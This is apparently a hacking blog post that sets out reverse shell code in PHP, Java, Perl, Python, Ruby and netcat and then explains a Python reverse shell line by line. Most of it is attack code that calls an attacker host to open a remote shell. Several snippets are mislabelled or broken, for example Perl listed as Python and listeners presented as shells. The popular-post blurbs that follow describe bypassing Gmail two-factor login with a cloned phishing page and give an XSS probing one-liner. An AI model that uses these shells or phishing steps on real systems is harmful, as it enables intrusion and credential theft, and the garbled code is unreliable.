REVERSE SHELL USING CODING

-

 REVERSE SHELL USING CODING IN PHP,JAVA,PYTHON,PERL,RUBY


PHP Reverse Shell

The attacker establishes a command shell on a remote machine by exploiting a vulnerability in the target system and using PHP, a server-side scripting language, to execute commands on the target machine:

<?php

    // Start a listener on the attacker's machine

    $sock=fsockopen("attacker-ip", 4444);

    exec("/bin/sh -i <&3 >&3 2>&3");

?>

The PHP code uses the fsockopen() function to open a connection to the listener and the exec() function to execute the /bin/sh shell and redirect its input, output, and error streams to the connection with the listener.

Java Reverse Shell

Here is an example of a reverse shell targeting a machine using Java: 

public class ReverseShell {

    public static void main(String[] args) {

        // Start a listener on the attacker's machine

        try (ServerSocket serverSocket = new ServerSocket(4444)) {

            // Wait for a connection from the target machine

            try (Socket clientSocket = serverSocket.accept()) {

                // Open an input and output stream to the target machine

                BufferedReader in = new BufferedReader(new InputStreamReader(clientSocket.getInputStream()));

                PrintWriter out = new PrintWriter(clientSocket.getOutputStream(), true);

                // Execute the command shell

                Process p = Runtime.getRuntime().exec("/bin/sh");

// Redirect the input, output, and error streams of the command shell to the connection

                new Thread(new SyncPipe(p.getErrorStream(), out)).start();

                new Thread(new SyncPipe(p.getInputStream(), out)).start();

                new Thread(new SyncPipe(in, p.getOutputStream())).start();

            }

        } catch (IOException e) {

            e.printStackTrace();

        }

    }

}

Perl Reverse Shell

Perl is another good candidate for a reverse shell on a web server:

perl -e 'use Socket;$i="10.10.17.1";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python Reverse Shell

Here is a code example of a python reverse shell that can be used to establish a command shell on a remote machine:

  1. Start a listener on the attacker’s machine
use IO::Socket;

$|=1;

$socket = new IO::Socket::INET (

    LocalHost => '0.0.0.0',

    LocalPort => '4444',

    Proto => 'tcp',

    Listen => 1,

    Reuse => 1

);
  1. Wait for a connection from the target machine
$new_socket = $socket->accept();
  1. Open a command shell on the target machine
system("/bin/sh -i <&3 >&3 2>&3");
  1. Close the connection
$new_socket->close();

Ruby Reverse Shell

Here is a code example of a Ruby reverse shell that can be used to establish a command shell on a remote machine:

  1. Start a listener on the attacker’s machine
require 'socket'

server = TCPServer.new(4444)
  1. Wait for a connection from the target machine
client = server.accept
  1. Open a command shell on the target machine
exec("/bin/sh -i <&3 >&3 2>&3")
  1. Close the connection
Client.close

Netcat Reverse Shell

Here is a code example of a NetCat reverse shell:

  1. Start a listener on the attacker’s machine
nc -nlvp 4444
  1. On the target machine, use NetCat to establish a connection back to the listener
nc -e /bin/sh attacker-ip 4444

Execute a reverse shell in Python Reverse Shell

To understand how a reverse shell works, we’ll examine a piece of code that can be used to establish a remote shell on Python:

import socket

import subprocess

import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(("0.0.0.0", 7777))

os.dup2(s.fileno(), 0)

os.dup2(s.fileno(), 1)

os.dup2(s.fileno(), 2)

p = subprocess.call(["/bin/sh", "-i"])

Establishing a connection

These two lines are used to establish a connection to Python’s socket module. It creates a socket with an IPv4 address which communicates over TCP.

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

This line specifies which IP address and port the socket should listen on:

s.connect(("0.0.0.0", 7777))

Overwriting file descriptors

Python’s CLI uses three data streams to handle shell commands: stdin for input data, stdout for output data, and stderr for error messages. Internally these are designated as 0, 1, and 2.

The shell code now uses the dup2 command of the Python os module, which interacts with the operating system.

The following command takes the file descriptor generated by the previous socket command, and duplicates it three times, overwriting the data streams stdin, stdout, and stderr with the reverse shell socket we created. s.fileno() refers to the file descriptor of the socket.

os.dup2(s.fileno(), 0)

os.dup2(s.fileno(), 1)

os.dup2(s.fileno(), 2)

Once these commands run, the three data streams of the CLI are redirected to the new socket, and are no longer handled locally.

Spawning the shell

The final stage of the attack is to run the Python subprocess module. This allows the reverse shell to run a program as a subprocess of the socket. The subprocess. call command lets us pass any executable program. By passing /bin/sh, we run a Bash shell as a sub-process of the socket we created.

p = subprocess.call(["/bin/sh", "-i"])

At this point, the shell becomes interactive – any data written to the shell will be written to the terminal and read through the terminal as if it was the main system shell. It is now possible to establish a connection back to the attacker’s machine, and allow them to execute commands remotely on the target machine.

Comments

Post a Comment

Popular posts from this blog

FOUNDATIONS OF CYBERSECURITY GOOGLE(COURSERA) QUIZ ANSWERS

-
Image
 FOUNDATIONS OF CYBERSECURITY GOOGLE(COURSERA) QUIZ ANSWERS    Hi guys, i've completed a courses on foundations of cyber security in coursera. here am gonna drop my answer which i've noted while  studying  this  course. ill drop the link of the notion  LINK: notion answer for foundation of cybersecurity in coursera     the above is the sequence order of the answer 
Read more

HOW TO BYPASS THE 2FA(TWO FACTOR AUTHENTICATION)

-
Image
HOW TO BYPASS THE 2FA(TWO FACTOR AUTHENTICATION) of gmail  Initially we should know about some basics of phishing attack, It is the base techinque we use here to gain password of victim        REQUIREMENTS 1)KALI LINUX 2)SUBLIME TEXT EDITOR 3)NGROK STEP 1: Initially use your browser and search for google sign in STEP 2: Type the mail id you wanna hack, after entering the mail id and click next STEP 3: After entering the mail id and right click the mouse and click inspect  STEP 4: after clicking inspect element ,go to inspector tab or element tab and right click and click the option called EDIT AS HTML,copy all html codes. STEP 5: paste it on sublime text editor and add some script at the end of the html tag ill drop the code here <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script> <script>     $('button').click(function(e){       e.preventDefault()       auth=$('...
Read more

PlayItSafe google cyber security professional course 2 (COURSERA)

-
Image
 PlayItSafe google cyber security professional course 2 (COURSERA) 1)More about the CISSP security domains-practice quiz      2)Navigate threats, risks, and vulnerabilities- quiz 3)weeklychallenge-1                       4)Test your knowledge: More about frameworks and controls-quiz 5)Test your knowledge: The CIA triad-quiz Test your knowledge: NIST frameworks Test your knowledge: OWASP principles and security audits Weekly challenge 2 Practice Quiz: Test your knowledge: Security information and event management (SIEM) dashboards Test your knowledge: Identify threats and vulnerabilities with SIEM tools Weekly challenge 3 Test your knowledge: Incident response Test your knowledge: Use a playbook to respond to an incident Weekly challenge 4 Hey guys this blog contains all answers of coursera 's google cyber security professional certification quiz answers. 
Read more

BITFLIPING

-
Image
BIT-FLIPING            Digital data, such as text, images, or videos, is stored and processed in computers as binary code, a sequence of 0s and 1s. Each 0 or 1 is called a bit, the smallest unit of data. A bit-flip occurs when a bit's state unintentionally changes from its initial value to the opposite. This can happen due to hardware errors, electromagnetic interference, or other factors. Bit-flips can lead to data corruption, software crashes, or system failures. To mitigate such issues, error-correcting codes and redundancy techniques are employed to detect and correct errors. Ensuring data integrity and reliability is crucial in digital systems to prevent data loss and maintain accurate information. In the realm of computing, bitsquatting and bit flipping are two intriguing phenomena that revolve around the fundamental building blocks of digital data - bits, which represent zeros and ones. Bitsquatting involves a scenario where a bit within a domain nam...
Read more

AUTOMATED SCRIPT FOR FINDING XSS

-
Image
 AUTOMATED SCRIPT FOR FINDING XSS               An example of a web security vulnerability is cross-site scripting (XSS), which enables attackers to insert malicious executable scripts into the code of a website or application that is trusted. An XSS attack is frequently started by an attacker tempting a user to click on a malicious link that they deliver to them. Through cross-site scripting (XSS) assaults, attackers can get around access restrictions like the same-origin policy, which separates websites from one another.Zero When the victim accesses the website or application that runs the malicious code, the attack really takes place.1. Malicious scripts are injected into websites that are otherwise trustworthy and benign in an exploit known as cross-site scripting (XSS). HERE IS THE SCRIPT THAT AUTOMATES XSS DETECTION  cat urls.txt| egrep -iv ".(jpg|jpeg|js|cs|gif|tiff|png|woff|woff2|ico|pdf|svg|txt)" |qsreplace ' "><()'|tee c...
Read more

BEGINNER BUG BOUNTY TOOLS PART-1

-
 BEGINNER BUG BOUNTY TOOLS PART-1 Subdomain Enumeration:     Subdomain enumeration, also known as subdomain discovery or subdomain reconnaissance, is the process of finding subdomains associated with a domain. Subdomains are part of a larger domain and can represent specific services, departments, or functions within an organization. Enumerating subdomains can be important for various purposes, including security assessments, web application testing, and domain management. Tools with Description Sublist3r - Fast subdomains enumeration tool for penetration testers Amass - In-depth Attack Surface Mapping and Asset Discovery massdns - A high-performance DNS stub resolver for bulk lookups and reconnaissance (subdomain enumeration) Findomain - The fastest and cross-platform subdomain enumerator, do not waste your time. Sudomy - Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug huntin...
Read more

The article explores the technique of remote server control through reverse shells employed by hackers, emphasizing their ability to gain unauthorized access and control over servers.

-
Image
 The article explores the technique of remote server control through reverse shells employed by hackers, emphasizing their ability to gain unauthorized access and control over servers. In a conventional client-server setup, users interact with machines that offer services, and the roles of client and server are clearly defined. The client takes the initiative by establishing a connection to the server, which in turn listens for incoming connections on designated ports. This traditional model maintains a regulated communication flow, where the client makes requests and the server responds accordingly. Nevertheless, within the domain of cybersecurity, threat actors consistently seek out new methods to exploit vulnerabilities and circumvent security safeguards. A prime example of such ingenuity is the reverse shell attack, which cleverly subverts the conventional client-server paradigm. Through skillful manipulation of this fundamental communication flow, attackers can infiltrate netw...
Read more

Things should do after sublister(sublist3r)

-
Image
Things should do after sublister(sublist3r)  Sublist3r is tool which is used by pentester  which shows unique subdomains as I showed below  you won't get https:// in the begging of these url ,here I have a solution for it i.e ive developed a one line script for this Step 1: copy all the subdomains, After that use the command nano and store all the links and name it You see,there no https:// infront of the subdomains Step 2: USE THE BELOW COMMAND  sudo python -c "with open('input.txt', 'r') as infile, open('output.txt', 'w') as outfile: outfile.write('\n'.join(['https://' + line.strip() for line in infile]))" boom!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Read more

BEGINNER BUG BOUNTY TOOLS PART 2

-
Image
 BEGINNER BUG BOUNTY TOOLS PART 2 Port Scanning Port scanning is the process of systematically scanning a network or a host to discover open ports and services that are available for communication. Ports are communication endpoints used in networking, and each port is associated with a specific service or protocol. Port scanning is a common technique used in network reconnaissance and security assessments, both for legitimate purposes like network troubleshooting and for potentially malicious activities like identifying vulnerable services. This this definition given by chatgpt     let us see some port scanning tool used for bug bounty masscan - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes. RustScan - The Modern Port Scanner naabu - A fast port scanner written in go with focus on reliability and simplicity. nmap - Nmap - the Network Mapper. Github mirror of official SVN repository.   If you are using kali linux...
Read more

how hackers do a phishing page in 8 lines of code using html

-
Image
 How Hackers do a phishing page in  8 lines of code  phishing,what is phishing?         Phishing is a cybercrime where scammers deceive individuals or organizations by creating fake emails, websites, or messages that appear legitimate to trick victims into providing sensitive information, such as login credentials, financial data, or personal details. These fraudulent attempts aim to steal valuable information or gain unauthorized access to accounts and can lead to identity theft, financial loss, or other malicious activities. To protect against phishing, it's crucial to be cautious of suspicious emails, links, and requests for personal information, and to verify the authenticity of websites and messages before sharing sensitive data. Always use strong passwords and enable multi-factor authentication whenever possible to enhance security. PRACTICAL STEPS: Here , I am gonna clone the amazon website with only 8 lines HERE IS THE CODE <html> <hea...
Read more